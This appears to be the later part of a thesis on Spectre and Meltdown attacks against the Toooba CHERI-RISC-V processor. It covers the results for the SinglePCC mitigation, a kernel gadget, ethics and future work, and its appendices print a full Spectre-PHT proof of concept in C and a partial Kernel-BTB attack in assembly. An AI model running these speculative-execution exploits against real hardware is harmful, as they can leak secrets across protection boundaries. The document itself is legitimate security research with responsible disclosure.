6.1.2 Testing SinglePCC I ran all major Spectre-style attacks on the branch of Toooba that has been ex- tended with SinglePCC. The results are summarised in Table 6.1. SinglePCC successfully mitigates attacks that target injecting an address into the BTB or RSB that is located at an address out-of-bounds of the PCC for this compart- ment or part of the code, e.g., a function whose PCC is exactly limited to its respective code. A jump to another compartment is possible – but not in spec- ulation. This leads to the fact that the attacker chosen gadget will never be executed. However, SinglePCC does not mitigate the following attack case: I assume to have two identical compartments that only differ in having different ASIDs. Furthermore, one compartment is under control of the attacker, the other compartment is benign. The compartment under attacker control can inject an entry into the BTB or RSB and when the benign compartment is ex- ecuted the next time, it will follow the misprediction. Capabilities describe virtual addresses, but do not contain any information about address spaces. SinglePCC mandates that the address in speculation must be in the current bounds, but this does not forbid this case of cross protection domain training because SinglePCC does not know about the different address spaces. Furthermore, SinglePCC does not mitigate Spectre-PHT nor does it mit- igate Spectre-STL-Load. In the case of Spectre-PHT, the attacker only mis- trains the branch prediction direction, but both the target in case of taken and the target in case of not taken are in the current bounds, which means that SinglePCC does not take effect here. For Spectre-STL-Load, the reason is similar. This attack loads a stale memory value, but it does not affect branch targets and therefore the address always stays within the current bounds. How- ever, SinglePCC mitigates Spectre-STL-Jump if the jump goes out-of-bounds for the same reasons as SinglePCC mitigates Spectre-BTB and Spectre-RSB. Last, SinglePCC only mitigates attacks that involve jumping. Therefore, Sin- glePCC does not mitigate any of the Meltdown-CF attacks. With SinglePCC enabled, an attacker cannot train the BTB with targets outside of the bounds of the current PCC. However, the attacker can train the BTB with targets in bounds. In the case the current bounds are not tight, this 60 CHAPTER 6. DISCUSSION

asm CHERI asm Spectre-PHT ✓ ✓ Spectre-BTB ✓ ✗ Spectre-RSB ✓ ✗ Spectre-STL-Load ✓ ✓ Spectre-STL-Jump ✓ ✗

Table 6.1: Overview of attempted Spectre-style attacks and whether they were successful when SinglePCC is applied. gives the attacker a higher probability to find a suitable gadget in the victim’s code.

6.1.3 Hardening SinglePCC Running the Spectre-style transient-execution attacks in Toooba with SinglePCC being enabled revealed a dangerous vulnerability in the initial Sin- glePCC implementation. My example of Spectre-RSB worked even though the return address injected into the RSB was out-of-bounds of the current PCC of the victim. This could be traced back to an error in the microarchi- tecture in collaboration with Jonathan Woodruff. In my example, the victim PCC starts at address 0x80040000, whereas the attacker PCC starts at address

0x80080000. The entire PCCs of the victim (PCCv) and the attacker (PCCa) are:

PCCv = 0xffff200000018004 _0000000080040000 (6.1)

PCCa = 0xffff200000018004 _0000000080080000 (6.2)

In order to understand the error in the microarchitecture, I need to ex- plain CHERI Concentrate [38] – the compression mechanism used in order to achieve 128-bit capabilities. As depicted in Figure 6.1, CHERI Concen- trate divides the memory space into three different parts from the view of one capability: the unrepresentable region, the representable space, and the deref- erenceable region. In the erroneous SinglePCC implementation, Toooba pulled the address from the RSB and then applied a function that adds the bounds of the current PCC. In order to improve overall performance – to shorten the critical path CHAPTER 6. DISCUSSION 61

Unrepresentable region top address Representable space

base Dereferenceable region

Figure 6.1: Memory regions implied by the CHERI Concentrate encoding. Taken and adapted from Woodruff et al. [38].

– the implementors used a function that sets the address, but does not check whether the address is representable. This function is unsafe, but superior to its safe counterpart in terms of performance. Because of the alignment of the victim and attacker PCC, they have the same encoding through CHERI

Concentrate. PCCv and PCCa differ only in the actual address, but the com- pressed bounds bits are identical. In general, CHERI Concentrate can have multiple memory regions whose bounds are encoded with the same bit pat- tern – all these capabilities only differ in the actual address. The unsafe set of the address leads to the fact that the attacker address pulled from the RSB is considered in bounds. Therefore, the bounds check following the address set- ting function will not fail and Toooba will speculatively jump to the attacker’s gadget and therefore the entire attack succeeds. My findings caused the SinglePCC implementation to be reviewed and changed accordingly. A more costly but safe function for setting the address coming from the RSB is used in the current design. This function will check whether the address is in the unrepresentable region and this fact will cause the function to strip the capability’s tag bit in my attack case. In turn, this invalid capability will not pass the bounds checks and therefore Toooba will not speculatively jump to this address – as it is intended to work. Later, Woodruff implemented another approach that decodes the bounds of the current PCC and writes them to hardware registers. These bounds are then used for comparing against addresses coming from the BTB and RSB. Only in case of a jump that is architecturally taken, these bounds registers will change. 62 CHAPTER 6. DISCUSSION

ld a0, 1000(s5) ld a1, 208(a0) add a0, zero, s1 jalr ra, a1

Figure 6.2: CheriBSD kernel code that is suitable for a Spectre-BTB attack.

6.1.4 Spectre-BTB in Kernel Code In order to confirm the need for mechanisms that mitigate Spectre-style at- tacks, I present a possible vulnerability that would allow to bypass CHERI’s security measures in a real-world environment. In this section, I describe the possible attack of a CHERI system using the presence of an operating system – in this case CheriBSD. In this attack scenario, I use the hybrid-kernel version of CheriBSD, which means that the kernel itself does not use capabilities for its code and data, but the kernel fully enables user-space programs to do so. In Figure 6.2, I show a short snippet of the CheriBSD kernel code for han- dling exceptions. The reader may note that this code is not CHERI-RISC-V assembly, but conventional RISC-V assembly. This is caused by the fact that the kernel itself does not use capabilities. This code is part of the syscal- lenter function, which is indirectly called by the do_trap_user function – the function that handles exceptions coming from U privilege mode. The code depicted in Figure 6.2 fulfills all the criteria in order to be exploitable for a Spectre-BTB attack. As described in Section 5.1.3, the goal of the at- tacker is to alias an indirect jump, which is in this example jalr ra, a1. Furthermore, the attacker has to ensure that load operation writing into a1 is delayed, e.g., by making it miss all caches. This will lead to a misspeculation to the attacker’s gadget that has been injected to the BTB previously. This kind of attack is a large threat to CHERI systems as it gives attack- ers powerful capabilities normally used by the kernel. The attacker could at- tempt to find a powerful capability, e.g., derived from a SCR or a CSR, that still is in the register state from calls to previous functions. However, the fact that the kernel is not using capabilities gives the attacker another option to conduct impactful attacks. For memory operations not issued through capa- bilities, CHERI systems implicitly use the DDC register. In order to satisfy the wide range of memory accesses performed by the kernel, the capability in DDC has to be suitably powerfully configured. In case of an attack, the DDC register can be used by attackers as well and gives them plenty of options to attack CheriBSD’s kernel through Spectre-BTB attacks. CHAPTER 6. DISCUSSION 63

As presented in Section 6.1.2, SinglePCC will mitigate attacks that are based on Toooba misspeculating to another compartment. In order to success- fully mititgate the attack above, SinglePCC requires the bounds for the kernel PCC to be tightly bound. If this is not the case, SinglePCC will not mitigate this attack as no out-of-bounds jump will be detected. Therefore, this example illustrates again how important it is for the overall security of a CHERI system to be configured with the principle of least privilege. Furthermore, it shows the importance of the framework I created during my work.

6.2 Preventing Meltdown-CF

The Meltdown-CF attacks explained in Section 5.2.3 pose a large threat to CHERI systems. The analysis presented in this work inspired CHERI hard- ware designers to propose solutions that are outlined in the following para- graphs. All Meltdown-style attacks are caused by exceptions not being raised at the right point of time in the pipeline, which leads to illegal data being forwarded and used in transient-execution sequences. As explained in Sec- tion 2.4.5, CHERI implementations need to prevent Meltdown-CF attacks. This can be done both architecturally and microarchitecturally. Jonathan Woodruff and Peter Rugg proposed in several personal meetings that the ISA could be changed such that instructions in the Meltdown-CF sub- class no longer throw hardware exceptions, but instead forward invalid capa- bilities in case of a failure. This will entirely prevent transient-execution from taking effect as memory operations through invalid capabilities are not allowed and will lead to a hardware exception in Toooba. Furthermore, Woodruff and Rugg presented the idea of changing the mi- croarchitecture only without adjusting the ISA. They propose to not write any capability to the physical register file that exceeds the privileges of its operands even if only used in a transient path. This will prevent any privilege escalation. Both approaches have a common denominator as the capability checks need to be resolved before writing any value to the physical register file. Wood- ruff and Rugg state further that this will not have a performance impact on CUnseal and CInvoke, but it will cost performance for the CBuildCap and CSetBounds instructions due to capability compression being on the ciritical path. 64 CHAPTER 6. DISCUSSION

6.3 Ethics and Sustainability

When conducting attacks for scientific reason, it has to be ensured that both no harm to real-world systems is done and that the attack is responsibly disclosed. Responsible disclosure means that the attackers wait a period of time before disclosing the vulnerability such that affected systems have enough time to take measures. Publications about transient-execution attacks followed these prin- ciples from the beginning [22, 27]. I complied with these principles through- out my thesis work as well. Whilst performing my attacks, I only operated on a simulation running on a server and therefore did no harm to any real-world system. Toooba is a research processor in development whose purpose is to enable security research. Therefore, I can disclose the found vulnerabilities immediately with the publication of this thesis. One goal of this thesis was to provide a platform for further research on these attacks. Another goal was to show the possibility for transient-execution attacks. As described in previous sections in this chapter, my research has led to initial mitigation mechanisms being put in place in Toooba. This will inspire hard- ware designers to develop more sophisticated mitigation mechanisms that will strengthen CHERI’s security claims. The computer science society is now aware that transient-execution attacks affect many microarchitectures and that mitigation mechanisms are crucial. A point often overlooked is sustainability. Modern computing can help to sustainably use resources, e.g., smart irrigation systems. However, all systems need computing power in order to make decisions that benefit sustainability. My research will lead to CHERI systems becoming more secure. CHERI’s strong security claims will remove concerns about security and therefore foster the use of CHERI in sustainable systems.

6.4 Future Work

This thesis work answered the question of whether transient-execution attacks are possible in Toooba and CHERI systems in general. However, many ques- tions still remain unanswered – especially regarding more advanced transient- execution attacks running in a real-world environment. Currently, Toooba is fairly conservative and is not yet instantiated with a multi-core setup. This ef- fectively mitigates advanced transient-execution attacks, but also significantly limits performance. Changes on a per core basis, e.g., adding sophisticated data-value speculation to the processor will enrich the microarchitectural state, CHAPTER 6. DISCUSSION 65

which will give an attacker plenty of options to attempt transient-execution at- tacks on a RISC-V or CHERI-RISC-V system. This means that future work will aim to improve Toooba’s performance and evaluate whether a richer mi- croarchitectural state leads to the possibility of sophisticated transient-execution attacks. It is not yet clear how CHERI capabilities interact with transient-execution attacks. For the most cases, capabilities are an obstacle for an attacker, but they can be of advantage as well. Considering a single-address-space operating sys- tem as proposed in [37], speculative bounds escalation can pose a large threat to CHERI systems as the CBuildCap attack example has shown. It has to be researched whether there exist other ways to escalate privilege in speculation. Furthermore, other interactions in a full operating system environment are of interest to the attacker, e.g. achieving longer load miss penalties by creating TLB misses. Besides the feasibility of an attack, the quality of possible attacks has to be investigated. CHERI-RISC-V systems differ in instruction sequences from conventional RISC-V systems and are likely to introduce noise, e.g., ca- pababilities have to be loaded from a capability table first. These loads can impact cache traces and therefore can change the transmission rates in real- word attacks. In general, my work has looked at Toooba only in simulation through veri- lator. An instance of Toooba being synthesised to a Field Programmable Gate Array (FPGA) will bring new insights and make the results more robust. Fur- thermore, it would be interesting to conduct research on transient-execution attacks on the ARM Morello architecture [49]. The different design choices and the different underlying ISA will likely have an impact on which attacks are successful and what their respective quality is. Chapter 7

Conclusions

In this work, I performed initial research on transient-execution attacks on the superscalar out-of-order CHERI-RISC-V microprocessor Toooba. I can clearly answer the question of whether Toooba is vulnerable to transient-execu- tion attacks in the affirmative. In both RISC-V and CHERI-RISC-V assembly, I could successfully conduct transient-execution attacks. This work was the first to completely reproduce the major transient-execution attacks on a RISC- V processor and it was the first work to attempt attacks of this class against CHERI capability protection. I find that transient-execution attacks violate CHERI’s security model in two ways and therefore require mitigation and pre- vention mechanisms to be put into place. First, control-flow can be hijacked through Spectre-BTB and Spectre-RSB allowing attackers to direct control to their chosen gadgets in speculation. Second, Meltdown-Capability-Forgery poses a large vulnerability as attackers can transiently escalate privilege. I showed that both subclasses of transient-execution result in a large threat to code running on Toooba. I believe that both attack classes can be prevented or mitigated by security mechanisms currently being developed. However, I be- lieve that further findings have yet to be made about transient-execution attacks on CHERI-RISC-V microprocessors. I further think that transient-execution attacks will significantly impact threat models and hardware design of any mi- croarchitecture in the future, and especially capability systems as they assure high security measures. This work builds the basis for advanced research on transient-execution attacks on RISC-V microprocessors. Furthermore, it sets the stage for a first generation of commercial CHERI microprocessors to en- sure that CHERI’s strong architectural guarantees are also non-bypassable in speculation.

66 Bibliography

[1] The MITRE Corporation. CVE-2014-0160. https://cve.mitre. org/cgi-bin/cvename.cgi?name=CVE-2014-0160. 2013. [2] Trevor Jim et al. “Cyclone: A Safe Dialect of C”. In: Proceedings of the General Track of the Annual Conference on USENIX Annual Tech- nical Conference. ATEC ’02. USA: USENIX Association, June 2002, pp. 275–288. isbn: 1880446006. [3] George C. Necula, Scott McPeak, and Westley Weimer. “CCured: Type- Safe Retrofitting of Legacy Code”. In: Proceedings of the 29th ACM SIGPLAN-SIGACT Symposium on Principles of Programming Languages. POPL ’02. Portland, Oregon: Association for Computing Machinery, Jan. 2002, pp. 128–139. [4] Archibald Samuel Elliott et al. “Checked C: Making C Safe by Ex- tension”. In: 2018 IEEE Cybersecurity Development (SecDev). Cam- bridge, MA, USA, Sept. 2018, pp. 53–60. [5] Thomas Bourgeat et al. “MI6: Secure Enclaves in a Speculative Out-of- Order Processor”. In: Proceedings of the 52nd Annual IEEE/ACM In- ternational Symposium on Microarchitecture. MICRO ’52. Columbus, OH, USA: Association for Computing Machinery, Oct. 2019, pp. 42– 56. [6] Marno van der Maas and Simon W. Moore. “Protecting Enclaves from Intra-Core Side-Channel Attacks through Physical Isolation”. In: Pro- ceedings of the 2nd Workshop on Cyber-Security Arms Race. CYSARM’20. Virtual Event, USA: Association for Computing Machinery, Nov. 2020, pp. 1–12. [7] Maurice V. Wilkes and Roger M. Needham. The Cambridge CAP Com- puter and Its Operating System. Elsevier, Jan. 1979.

67 68 BIBLIOGRAPHY

[8] William B. Ackerman and William W. Plummer. “An implementation of a computer system”. In: SOSP ’67: Proceedings of the First ACM Symposium on Operating System Principles. New York, NY, USA: ACM, 1967, pp. 5.1–5.10. [9] Dmitry Evtyushkin et al. “BranchScope: A New Side-Channel Attack on Directional Branch Predictor”. In: Proceedings of the Twenty-Third International Conference on Architectural Support for Programming Languages and Operating Systems. ASPLOS ’18. Williamsburg, VA, USA: Association for Computing Machinery, Mar. 2018, pp. 693–707. [10] Krste Asanović and David A. Patterson. Instruction Sets Should Be Free: The Case For RISC-V. Tech. rep. UCB/EECS-2014-146. University of California at Berkeley, Electrical Engineering and Computer Sciences, Aug. 2014. [11] Editors Andrew Waterman and Krste Asanović. The RISC-V Instruction Set Manual. Document Version 20191213. Volume I: User-Level ISA. RISC-V Foundation. Dec. 2019. [12] Editors Andrew Waterman and Krste Asanović. The RISC-V Instruction Set Manual. Document Version 20190608-Priv-MSU-Ratified. Volume II: Privileged Architecture. RISC-V Foundation. June 2019. [13] Robert M. Tomasulo. “An Efficient Algorithm for Exploiting Multiple Arithmetic Units”. In: IBM Journal of Research and Development 11.1 (1967), pp. 25–33. [14] David A. Patterson and John L. Hennessy. Computer Organization and Design, RISC-V Edition: The Hardware/Software Interface. 6th. San Francisco, CA, USA: Morgan Kaufmann Publishers Inc., 2017. isbn: 9780128122754. [15] John L. Hennessy and David A. Patterson. : A Quantitative Approach. 6th. San Francisco, CA, USA: Morgan Kauf- mann Publishers Inc., 2017. isbn: 9780128119068. [16] David M. Gallagher et al. “Dynamic Memory Disambiguation Using the Memory Conflict Buffer”. In: Conference on Architectural Support for Programming Languages and Operating Systems. San Jose, CA, USA, Oct. 1994. [17] Martin Schwarzl et al. Speculative Dereferencing of Registers: Reviving Foreshadow. Aug. 2020. arXiv: 2008.02307. BIBLIOGRAPHY 69

[18] Yuval Yarom and Katrina Falkner. “FLUSH+RELOAD: A High Res- olution, Low Noise, L3 Cache Side-Channel Attack”. In: USENIX Se- curity Symposium. San Diego, CA: USENIX Association, Aug. 2014, pp. 719–732. [19] Claudio Canella et al. “A Systematic Evaluation of Transient Execution Attacks and Defenses”. In: Proceedings of the 28th USENIX Conference on Security Symposium. SEC’19. Santa Clara, CA, USA: USENIX As- sociation, Aug. 2019, pp. 249–266. [20] Jo Van Bulck et al. “LVI: Hijacking Transient Execution through Mi- croarchitectural ”. In: 2020 IEEE Symposium on Security and Privacy (SP). San Francisco, CA, USA, 2020, pp. 54–72. [21] Robert N. M. Watson et al. Capability Hardware Enhanced RISC In- structions (CHERI): Notes on the Meltdown and Spectre Attacks. Tech. rep. UCAM-CL-TR-916. University of Cambridge, Computer Labora- tory, Feb. 2018. url: https://www.cl.cam.ac.uk/techreports/ UCAM-CL-TR-916.pdf. [22] Paul Kocher et al. “Spectre Attacks: Exploiting Speculative Execution”. In: IEEE Symposium on Security and Privacy. San Francisco, CA, USA, May 2019. [23] Esmaeil Mohammadian Koruyeh et al. “Spectre Returns! Speculation Attacks Using the Return Stack Buffer”. In: Proceedings of the 12th USENIX Conference on Offensive Technologies. WOOT’18. Baltimore, MD, USA: USENIX Association, Aug. 2018. [24] Giorgi Maisuradze and Christian Rossow. “Ret2spec: Speculative Exe- cution Using Return Stack Buffers”. In: Proceedings of the 2018 ACM SIGSAC Conference on Computer and Communications Security. CCS ’18. Toronto, Canada: Association for Computing Machinery, Jan. 2018, pp. 2109–2122. [25] Jan Horn. speculative execution, variant 4: speculative store bypass. https://bugs.chromium.org/p/project-zero/issues/ detail?id=1528. Feb. 2018. [26] Stephan Van Schaik et al. “RIDL: Rogue In-Flight Data Load”. In: IEEE Symposium on Security and Privacy. San Francisco, CA, USA, May 2019. [27] Moritz Lipp et al. “Meltdown: Reading Kernel Memory from User Space”. In: Commun. ACM (May 2020), pp. 46–56. 70 BIBLIOGRAPHY

[28] Jo Van Bulck et al. “Foreshadow: Extracting the Keys to the Intel SGX Kingdom with Transient Out-of-Order Execution”. In: 27th USENIX Security Symposium (USENIX Security 18). Baltimore, MD: USENIX Association, 991–1008. [29] Intel Corporation. Intel® Software Guard Extensions Developer Guide. https://software.intel.com/content/www/us/en/ develop/documentation/sgx-developer-guide/top. html. Sept. 2016. [30] Intel Corporation. Deep Dive: Intel Analysis of L1 Terminal Fault. Tech. rep. 2018. url: %5Curl%7Bhttps://software.intel.com/ security- software- guidance/advisory- guidance/ l1-terminal-fault%7D. [31] Ofir Weisse et al. Foreshadow-NG: Breaking the Virtual Memory Ab- straction with Transient Out-of-Order Execution. Tech. rep. 1.0. Aug. 2018, p. 7. url: https://foreshadowattack.eu/foreshadow- NG.pdf. [32] Arm Limited. Cache Speculation Side-channels. Tech. rep. 2.5. 2020, p. 21. url: https://developer.arm.com/support/arm- security-updates/speculative-processor-vulnerability. [33] Intel Corporation. Intel Analysis of Speculative Execution Side Chan- nels. Tech. rep. 4.0. 2018, p. 16. url: https://www.intel.com/ content/www/us/en/architecture-and-technology/ intel-analysis-of-speculative-execution-side- channels-paper.html. [34] Vladimir Kiriansky and Carl Waldspurger. Speculative Buffer Overflows: Attacks and Defenses. 2018. arXiv: 1807.03757 [cs.CR]. [35] Dag Arne Osvik, Adi Shamir, and Eran Tromer. “Cache Attacks and Countermeasures: The Case of AES”. In: Proceedings of the 2006 The Cryptographers’ Track at the RSA Conference on Topics in Cryptology. CT-RSA’06. San Jose, CA: Springer-Verlag, 2006, pp. 1–20. [36] Arm Limited. Arm v8.5-A CPU updates. https://developer. arm.com/support/arm-security-updates/speculative- processor-vulnerability. Version 1.4. June 2019. BIBLIOGRAPHY 71

[37] Robert N. M. Watson et al. Capability Hardware Enhanced RISC In- structions: CHERI Instruction-Set Architecture (Version 8). Tech. rep. UCAM-CL-TR-951. University of Cambridge, Computer Laboratory, Oct. 2020. url: https://www.cl.cam.ac.uk/techreports/ UCAM-CL-TR-951.pdf. [38] Jonathan Woodruff et al. “CHERI Concentrate: Practical Compressed Capabilities”. In: IEEE Transactions on 68.10 (2019), pp. 1455– 1469. [39] Brooks Davis et al. CheriABI: Enforcing valid pointer provenance and minimizing pointer privilege in the POSIX C run-time environment. Tech. rep. UCAM-CL-TR-932. University of Cambridge, Computer Lab- oratory, Apr. 2019. url: https://www.cl.cam.ac.uk/techreports/ UCAM-CL-TR-932.pdf. [40] Hongyan Xia et al. “CheriRTOS: A Capability Model for Embedded Devices”. In: 2018 IEEE 36th International Conference on Computer Design (ICCD). Orlando, FL, USA: IEEE Computer Society, Oct. 2018, pp. 92–99. [41] David Kaplan, Jeremy Powell, and Tom Woller. AMD SEV-SNP: Strength- ening VM Isolationwith Integrity Protection and More. Tech. rep. Ad- vanced Micro Devices Inc., Jan. 2020. url: https://www.amd. com/system/files/TechDocs/SEV-SNP-strengthening- vm-isolation-with-integrity-protection-and-more. pdf. [42] Abraham Gonzalez et al. “Replicating and Mitigating Spectre Attacks on a Open Source RISC-V Microarchitecture”. In: Third Workshop on Computer Architecture Research with RISC-V. Phoenix, AZ, USA, June 2019. [43] Christopher Celio, David A. Patterson, and Krste Asanović. The Berke- ley Out-of-Order Machine (BOOM): An Industry-Competitive, Synthe- sizable, Parameterized RISC-V Processor. Tech. rep. UCB/EECS-2015- 167. University of California at Berkeley, Electrical Engineering and Computer Sciences, June 2015. [44] Anh-Tien Le et al. “Experiment on Replication of Side Channel Attack via Cache of RISC-V Berkeley Out-of-Order Machine (BOOM) Im- plemented on FPGA”. In: Fourth Workshop on Computer Architecture Research with RISC-V (CARRV 2020). Valencia, Spain, May 2020. 72 BIBLIOGRAPHY

[45] Arm Limited. Vulnerability of Speculative Processors to Cache Tim- ing Side-Channel Mechanism. https://developer.arm.com/ support/arm-security-updates/speculative-processor- vulnerability. 2020. [46] Sizhou Zhang et al. “Composable Building Blocks to Open up Proces- sor Design”. In: 2018 51st Annual IEEE/ACM International Symposium on Microarchitecture (MICRO). Fukouka, Japan, Oct. 2018, pp. 68–81. [47] Zhen Hang Jiang and Yunsi Fei. “A novel cache bank timing attack”. In: 2017 IEEE/ACM International Conference on Computer-Aided Design (ICCAD). Irvine, CA, USA, Nov. 2017, pp. 139–146. [48] Hovav Shacham. “The Geometry of Innocent Flesh on the Bone: Return- into-Libc without Function Calls (on the )”. In: Proceedings of the 14th ACM Conference on Computer and Communications Security. CCS ’07. Alexandria, Virginia, USA: Association for Computing Ma- chinery, 2007, pp. 552–561. [49] Arm Limited. Arm Architecture Reference Manual Supplement Morello for A-profile Architecture. DDI0606. Arm Limited. Sept. 2020. Appendix A

Full C Attack

/* * Author: Franz Fuchs * * Spectre-PHT proof of concept version * * spec_funct first checks the array bounds * and then loads the value determined by the * index. By training the Pattern History Table * with 16 calls to the function with valid indexes, * we trick Toooba in speculatively executing * the loads even though the index is out of bounds. */

#ifdef __CHERI_PURE_CAPABILITY__ #include "pure_cap.h" #endif

#define MEM_SIZE 16384 #define MEM_SIZE_DW MEM_SIZE/8 #define STACK_SIZE 2048 #define STACK_SIZE_DW STACK_SIZE/8 #define PROBE_SIZE 2048 #define PROBE_SIZE_DW PROBE_SIZE/8 #define SEC_ARR_SIZE 128 #define SEC_ARR_SIZE_DW SEC_ARR_SIZE/8 #define FLUSH_ARR_SIZE 16384

73 74 APPENDIX A. FULL C ATTACK

#define FLUSH_ARR_SIZE_DW FLUSH_ARR_SIZE/8 long int mem[MEM_SIZE_DW]; long int buffer[FLUSH_ARR_SIZE_DW]; long int stack[STACK_SIZE_DW]; long int flush_arr[FLUSH_ARR_SIZE_DW];

// array with secrets that may not // be overflowed long int* sec_arr_1[SEC_ARR_SIZE_DW]; long int* sec_arr_2[SEC_ARR_SIZE_DW]; long int size = 16; int main(); void fill_sec_arr(); void probe(); long int spec_funct(long int index); void flush(); extern void _init_sp(void); int main() {

// write to stack in order to // not out-optimize this stack[0] = 0; size = 16; fill_sec_arr(); // train the pattern history table of the // speculative function flush_arr[0x0] = spec_funct(0x0); flush_arr[0x1] = spec_funct(0x1); flush_arr[0x2] = spec_funct(0x2); flush_arr[0x3] = spec_funct(0x3); flush_arr[0x4] = spec_funct(0x4); flush_arr[0x5] = spec_funct(0x5); APPENDIX A. FULL C ATTACK 75

flush_arr[0x6] = spec_funct(0x6); flush_arr[0x7] = spec_funct(0x7); flush_arr[0x8] = spec_funct(0x8); flush_arr[0x9] = spec_funct(0x9); flush_arr[0xa] = spec_funct(0xa); flush_arr[0xb] = spec_funct(0xb); flush_arr[0xc] = spec_funct(0xc); flush_arr[0xd] = spec_funct(0xd); flush_arr[0xe] = spec_funct(0xe); flush_arr[0xf] = spec_funct(0xf);

// flush cache to evict the line // containing the `size` parameter

flush();

// store index at mem // keep line cached sec_arr_2[8] = & (mem[0x40]);

// ensure that all previous // loads and stores are finished asm volatile("fence rw, rw");

// call spec function with // out of bounds argument flush_arr[0x20] = spec_funct(24);

// probe the memory probe(); } void fill_sec_arr() { for(int i = 0; i < size; i++) { sec_arr_1[i] = &(mem[0]); } } 76 APPENDIX A. FULL C ATTACK

void probe() { long int dest; for(int i = 0; i < FLUSH_ARR_SIZE_DW; i = i + 8) { dest = mem[i]; mem[i] = dest + 1; } } long int spec_funct(long int index) { long int dest = index;

if(index < size) { long int* mem_index = sec_arr_1[index]; dest = *mem_index; } return dest; } void flush() { long int dest; for(int i = 0; i < FLUSH_ARR_SIZE_DW; i = i + 8) { dest = flush_arr[i]; flush_arr[i] = dest + 1; } } In this appendix, I explain how I conducted a Spectre-PHT attack written in C. However, I do not explain the specific Spectre-PHT vulnerability as I have already done so in Chapters 4 and 5. I chose a similar setup to the original Spectre-PHT demonstrated in [22]. Parts of the preparation code, e.g., initial- ising registers, is not shown in the code above. The attack setup is as follows. The function spec_funct accesses the array sec_arr_1 and returns the value stored at the secret memory pointer if the parameter value index is less APPENDIX A. FULL C ATTACK 77

than size. I chose size to be 16 in this example. There exists another array sec_arr_2, which holds secret memory pointers as well. It is the goal of the attacker to reveal one or more secret memory addresses from sec_arr_2 in this attack. The arrays sec_arr_1 and sec_arr_2 are placed adjacently in mem- ory by the compiler. The attacker wants to use a greater index than allowed in order to read from sec_arr_2 instead of sec_arr_1. The code in main fulfills three functions: it prepares the attack, conducts it, and eventually re- veals the sought memory address by probing. In the preparation phase, I fill the array sec_arr_1 with meaningful pointer values and call the function spec_funct with values in the range [0,..., 0xf] for the index parame- ter. Next, I need to flush the memory in order to evict the cache line, which holds the value of the size variable. The flush function evicts cache lines by loading other cache lines currently not being present. Flushing introduces the necessary delay for the actual Spectre-PHT attack later. After flushing, I also setup the array sec_arr_2 for the attack by stor- ing a meaningful value. This brings the cache lines into the cache as well, which makes the attacker faster. The last step before the attack is introduce a memory fence, which avoids that the processor speculates too far. This would cause uninitialised data to be used in speculation, which would lead to cache misses and therefore would negatively impact the entire attack. In general, the attacker wants to use every cycle of the misspeculated control-flow as ef- fectively as possible and therefore attackers want to avoid unnecessary cache misses. After that, the actual attack is conducted as described in Chapters 4 and 5. Last, I use the probing mechanism described in Section 3.3.2, which reveals the sought value. Appendix B

Full CHERI-RISC-V Attack

.text

/* Kernel-BTB Author: Franz Fuchs

The goal of the attack is to speculatively jump from S mode to U mode. This gives an attacker the full register state of the code operating in S mode. In this example, the user code leaks private to M mode. This attack is similar to the sandbox attack.

1st load: 0x0000000080060000 2nd load: 0x0000000080061000 */ change_to_cap_mode: // set pcc flags such that capability encoding // mode is used // This is described in the CHERI Specification v7 cspecialr ct3, pcc li t1, 1 csetflags ct3, ct3, t1 li t2, 0x80000018 csetoffset ct3, ct3, t2

78 APPENDIX B. FULL CHERI-RISC-V ATTACK 79

cjr ct3 init_caps:

/* * data capabilities */

// cs1 is a capability to [0x80001000 - 0x80001fff] li t2, 0x80001000 cfromptr cs1, ddc, t2 li t1, 0x1000 csetbounds cs1, cs1, t1

// ct6 is a capability to [0x80002000 - 0x80002fff] li t2, 0x80002000 cfromptr ct6, ddc, t2 li t1, 0x1000 csetbounds ct6, ct6, t1 // store value at 0(ct6) li t1, 0x200 csd t1, 0(ct6)

/* * code capabilities */

// PCC for flush function cllc cs4, flush li t1, 0x100 csetbounds cs4, cs4, t1

// PCC for user code jump cllc cs5, user_funct_cont li t1, 0x100 csetbounds cs5, cs5, t1 80 APPENDIX B. FULL CHERI-RISC-V ATTACK

// PCC for kernel code jump cllc ct1, kernel_funct_cont li t2, 0x100 csetbounds ct1, ct1, t2 // store at 0(cs1) csc ct1, 0(cs1) init_exceps:

// enable interrupts for all privilege levels // MIE = 1, SIE = 1, UIE = 1 li t2, 0xb csrs mstatus, t2

// delegate ecalls to S mode // ecalls are set with bit 8 li t2, 256 csrw medeleg, t2

// changes to S mode change_to_s_mode:

// set MPP such that we return to S mode li x6, 0x00001000 csrc mstatus, x6 li x6, 0x00000800 csrs mstatus, x6

// store perform_s_mode_action address in mepcc cllc ct0, perform_s_mode_action cspecialw mepcc, ct0

mret

// initialises trap vector perform_s_mode_action:

// stvec mode: direct (value 0 as RISC-V instructions // are aligned on 2 byte boundaries) APPENDIX B. FULL CHERI-RISC-V ATTACK 81

// stvec base address: kernel_funct cllc ct2, kernel_funct li t1, 0x10000 csetbounds ct2, ct2, t1 cspecialw stcc, ct2 change_to_u_mode:

// set SPP such that we return to U mode li x6, 0x00000100 csrc sstatus, x6

// store user_funct address in mepcc cllc ct0, user_funct li t1, 0x10000 csetbounds ct0, ct0, t1 cspecialw sepcc, ct0

// jump to user code sret

flush: // flush entire cache

// use ddc for that // set to memory address not used by // other sections li t2, 0x80010000 li t3, 0x4000 add t3, t2, t3 cfromptr ct1, ddc, t2 flush_loop: cld t0, 0(ct1) cincoffsetimm ct1, ct1, 64 cgetaddr t0, ct1 ble t0, t3, flush_loop 82 APPENDIX B. FULL CHERI-RISC-V ATTACK

// fence instruction fence rw, rw cret

/* * kernel code * * running in S priviledge mode */

.section .kernel , "ax" kernel_funct: // jump to start function // done this way in order to always have the same // start address, which gives makes it easier to // alias the right BTB entry j kernel_funct_start

.rept 0x40 .byte 0x00 .endr kernel_funct_start: // generate a powerful capability li t2, 0x80060000 li t3, 0x10000 li t4, 0x1000 add t3, t2, t3 cfromptr ct6, ddc, t2 csd t4, 0(ct6)

// jump to kernel_funct_cont clc ct1, 0(cs1) // this jump will be aliased and MUST NOT be // moved around. If moved around, the corresponding // jump in the user code must be adjusted as well cjr ct1 APPENDIX B. FULL CHERI-RISC-V ATTACK 83

.rept 0x40 .byte 0x00 .endr kernel_funct_cont: // content of ct6 shall not be visible to anyone else cmove ct6, cnull // idle here j kernel_funct_cont

/* * user code * * running in U priviledge mode */

.section .user , "ax" user_funct: // done this way in order to always have the same // start address, which gives makes it easier to // alias the right BTB entry j user_funct_start

